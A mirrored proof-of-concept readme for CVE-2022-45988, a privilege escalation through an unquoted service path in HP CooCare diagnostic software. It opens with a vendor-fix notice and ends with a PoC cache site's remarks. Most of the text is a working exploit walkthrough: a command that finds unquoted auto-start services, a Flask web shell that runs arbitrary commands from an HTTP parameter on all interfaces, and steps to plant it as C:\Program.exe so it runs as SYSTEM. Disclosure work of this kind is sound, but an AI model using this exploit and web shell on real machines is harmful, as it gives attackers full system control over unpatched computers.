CVE-2022-45988 PoC — StarSoftComm HP CooCare 安全漏洞

Source

https://github.com/happy0717/CVE-2022-45988

Associated Vulnerability

Title:StarSoftComm HP CooCare 安全漏洞 (CVE-2022-45988)
Description:StarSoftComm HP CooCare是中国软通科技（StarSoftComm）公司的一款远程诊断软件。 StarSoftComm HP CooCare 5.304版本存在安全漏洞。攻击者利用该漏洞通过上传特制的文件提升权限并执行任意命令。

Description

CVE-2022-45988 StarSoftComm HP CooCare An elevation of privilege vulnerability exists

Readme

# CVE-2022-45988 StarSoftComm HP CooCare An elevation of privilege vulnerability exists 


####################################################

I have contacted with hp-security-alert They have fixed this bug. About StarSoftComm CooCare [HP-PSRT-IR #4106] 
![image](https://github.com/happy0717/CVE-2022-45988/blob/main/hp_mail.png)
The vendor responded with the following information:

Follow these steps to update:

1.	Launch eService
2.	Wait about 3 mins
3.	Close and launch eService again. 
4.	Check version is v5.364 or later.

#####################################


An elevation of privilege vulnerability exists in StarSoftComm HP CooCare which could allow an attacker to elevate their privilege level
e管家超级版是HP星14 pro 自带的一款远程诊断软件，该软件为StarSoftComm(软通科技)旗下产品

test on windows 11 22621.819   HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)

Affected version: CooCare below v5.364

#Vulnerability reproduction

#The first step：wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ 
find the service  （使用上述CMD命令找到未引用的服务）

![image](https://github.com/happy0717/CVE-2022-45988/blob/main/1.png)

The service name is Windows Application Management Service = AKA = WinAppMgmt  
服务的名称叫做Windows Application Management Service 简称是WinAppMgmt


![image](https://github.com/happy0717/CVE-2022-45988/blob/main/2.png)

The service is frome StarSoftComm CooCare

![image](https://github.com/happy0717/CVE-2022-45988/blob/main/3.png)

#Step 2：Prepare a malicious program

![image](https://github.com/happy0717/CVE-2022-45988/blob/main/pic2.png)

    from flask import Flask, request
    import os

    app = Flask(__name__)

    @app.route('/')
    def hello_world():
        r = request.args.getlist('cmd')  #Reception? cmd= parameter
        a=os.popen(r[0])  #Execute system commands
        l = a.read()
        return l  #return

    if __name__ == '__main__':
        app.run(host='0.0.0.0', port=14145, debug=True)  #Listen HTTP port 14145



I was useing python3 flask write a malicious exe .It can listenHTTP port 14145 and execute system commands.

Using commands pyinstaller.exe --onefile --windowed -F -w python_test.py make a malicious exe.



#Step 3：Put malware into path C:\ and rename malware to Program.exe


![image](https://github.com/happy0717/CVE-2022-45988/blob/main/4.png)



#Step 4：Start the Windows Application Management Service

If Windows Application Management Service is already start， you can restart it


![image](https://github.com/happy0717/CVE-2022-45988/blob/main/5.png)



#Step 5：Wait Windows Application Management Service start and execute the system commands
C:\Program.exe run as system

When I see Windows Application Management Service start in Taskmgr.exe whit SYSTEM, Then I can Open browser input http://127.0.0.1:14145?cmd=whoami

Wait..........

for...

it.

NT SYSTEM

![image](https://github.com/happy0717/CVE-2022-45988/blob/main/6.png)

File Snapshot


 [4.0K]  /data/pocs/6eb48f3410831af04fe16b7c119a2b2b72b045c3
├── [ 16K]  1.png
├── [ 50K]  2.png
├── [222K]  3.png
├── [158K]  4.png
├── [208K]  5.png
├── [174K]  6.png
└── [3.0K]  README.md

0 directories, 7 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!